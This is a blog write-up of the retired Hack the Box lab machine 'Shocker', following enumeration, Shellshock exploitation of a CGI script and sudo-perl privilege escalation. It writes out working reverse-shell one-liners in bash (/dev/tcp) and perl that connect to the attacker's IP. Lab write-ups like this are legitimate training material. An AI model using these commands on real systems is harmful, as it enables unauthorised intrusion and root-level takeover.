hackthebox

Hack the Box Writeup - Shocker

This post is a guide to the retired Hack the Box system, Shocker. Taking us through initial enumeration, all the way through to gaining a root shell.

Dean Williams

5 min read
Hack the Box Writeup - Shocker

Today's post will take us through one of the easier retired boxes on Hack the Box; Shocker.

The IP address of the box is 10.10.10.56 so, as always, lets start with our initial enumeration.

Enumeration

We begin with nmap.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.56

The flags breakdown as follows:

  • -sC : Run all default scripts
  • -sV : Enumerate versions of software running on found ports
  • -p- : Check all ports from 0 to 65535
  • -oA : Save the output of the scan in all available formats

This gives us the following results:

nmap_scan

As you can see we have two ports open; port 80 running Apache and port 2222 that seems to be running ssh.

Running curl on port 80 returns us the following HTML:

<!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html>

This shows that port 80 is in fact running a website, so lets have a dig at it with gobuster.

$ gobuster -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50

The flags are for the following settings:

  • -u : the URL of the host we wish to scan
  • -w : which word-list we want to use
  • -s : the response status codes we want to know about
  • -x : the file extensions we wish to check each entry of our word-list with
  • -t : the number of threads to run to speed things up a little bit

This finishes quite quickly with the following results:

gobuster_results

We can see that there is a cgi-bin directory currently returning a 403 - Forbidden response code. So lets run gobuster again, but starting in that cgi-bin directory this time.

$ gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50

Again, the results come back quite quickly, showing us a shell script called user.sh.

gobuster_results2

We can run curl on the newly found URL to verify it.

$ curl http://10.10.10.56/cgi-bin/user.sh

Given the output we receive back, it looks like the script is running some bash.

cgi_script

Now that we know we have a cgi script executing valid bash (and given the clue in the name of the machine), it seems that this machine is likely to be vulnerable to shellshock.

Exploitation

A quick search of exploit-db gives us a likely script we can use.

https://www.exploit-db.com/exploits/34900/

However, looking at the code we can see that we will need to specify an extra parameter in order to make sure the exploit script can find our vulnerable cgi script on the server.

So download the script and run it as follows (modifying the lhost and lport params to fit your machine):

$ python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4444 pages=/cgi-bin/user.sh

We get a shell, yay! :D

shell

The id command shows that we are running as the user shelly and a quick pwd shows that we need to change to the user's home directory to get hold of the user flag.

flag

Getting a Better Shell

Now that we have a basic shell and the first user flag, we need to enumerate the system from our new point of view. However, the first thing I want to do is get a better and more stable shell. Using the very useful reverse-shell cheat-sheet on pentestmonkey (here), we can setup a netcat listener on our Kali box, and then run the following in our basic shell.

$ bash -i >& /dev/tcp/10.10.14.15/8888 0>&1

better_shell

Then we can get a shell capable of job control by using a neat Python trick; except that the normal python binary doesn't seem to be on the machine. A quick locate python later however, shows us that python3 is on there instead. So now we can run the following:

$ python3 -c "import pty; pty.spawn('/bin/bash');"

More Enumeration

With our shiny new, more stable, shell, we can begin further enumeration of this box to elevate our privileges to root. One of the first things I check, before running any scripts like LinEnum.sh, is to take a look at the sudoers file.

$ sudo -l

Which in this case gives us a big win immediately.

sudoers

Privilege Escalation

This shows us that our current user can run the perl command using sudo without any passwords. So referring back to the pentestmonkey cheat sheet we can find a perl reverse shell, setup another netcat listener on a different port, then just run the perl one-liner using sudo.

$ sudo perl -e 'use Socket;$i="10.10.14.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root_flag

Winner, winner, chicken dinner!